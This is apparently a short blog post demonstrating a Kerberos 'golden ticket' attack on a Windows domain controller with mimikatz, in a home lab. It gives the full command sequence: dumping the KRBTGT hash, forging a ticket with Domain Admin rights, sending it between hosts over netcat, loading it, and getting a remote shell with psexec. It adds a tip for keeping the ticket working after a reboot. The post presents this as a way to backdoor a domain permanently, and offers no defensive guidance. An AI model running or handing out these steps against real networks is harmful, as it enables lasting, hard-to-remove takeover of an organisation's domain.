In my last post, I wrote about passing the hash using standard mimikatz tool. For this installment, I will demonstrate how to pass the ticket (ptt) using the same tool. PTT is a technique of backdooring a Windows Domain Controller(DC) permanently. Several advantages of PTT has over passing the hash (pth) is that it is very difficult to remove PTT backdoor because it is tied to the KRBTGT account that is built into Active Directory (AD). It was designed to manage the Kerberos Distribution Center; an essential component of Microsoft's entire single sign-on ecosystem. Resetting it will not remove it, neither will reinstalling/promoting a new DC using the same domain objects. Hence, why the name, 'golden ticket' was given. It also comes with default 'Domain Admin' privileges and 10 years validity period!!! You virtually have full control of the domain/forest, allowing you to manipulate any objects managed by the DC. Also, the userid created using this technique is not listed in the standard AD listing! You practically have God-like control over the entire enterprise domain!
In a nutshell, what I did was identify and dump the hash that identifies KRBTGT. Created a malicious ticket called 'hacker4' associating it with the corresponding sid/domain. After which, I saved it and transfered it to 'client-pc' using netcat and loaded in back into memory. I did a short video to demonstrate a simple technique using a windows client pc (client-pc) and a Windows 2008 Domain Controller (server-dc). The tough job is obtaining SYSTEM privilege on server-dc to run mimikatz which is out of scope of this post.
Summary of commands:
Steps On server-dc
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /admin:hackerboy /domain:bubblegum.com /sid:S-1-5-21-4052271652-3634189325-3875401421 /krbtgt:409adfdd28b38f3decff6609fe0a19a1
nc 10.0.0.234 1234 < ticket.kirbi
Steps On the client-pc
nc -nlpv 1234 > ticket.kirbi
kerberos::ptt ticket.kirbi
psexec64 \\server-dc cmd.exe
whoami /groups
P.O.C Recording
* Caveat: I recommend to create golden ticket with the same name as the admin on the DC. Psexec64.exe can't seem to pass the ticket when the user you created on the DC doesn't match the ticket after reboot.
kerberos::golden /admin:administrator /domain:bubblegum.com /sid:xxxxx /krbtgt:xxxx
No comments:
Post a Comment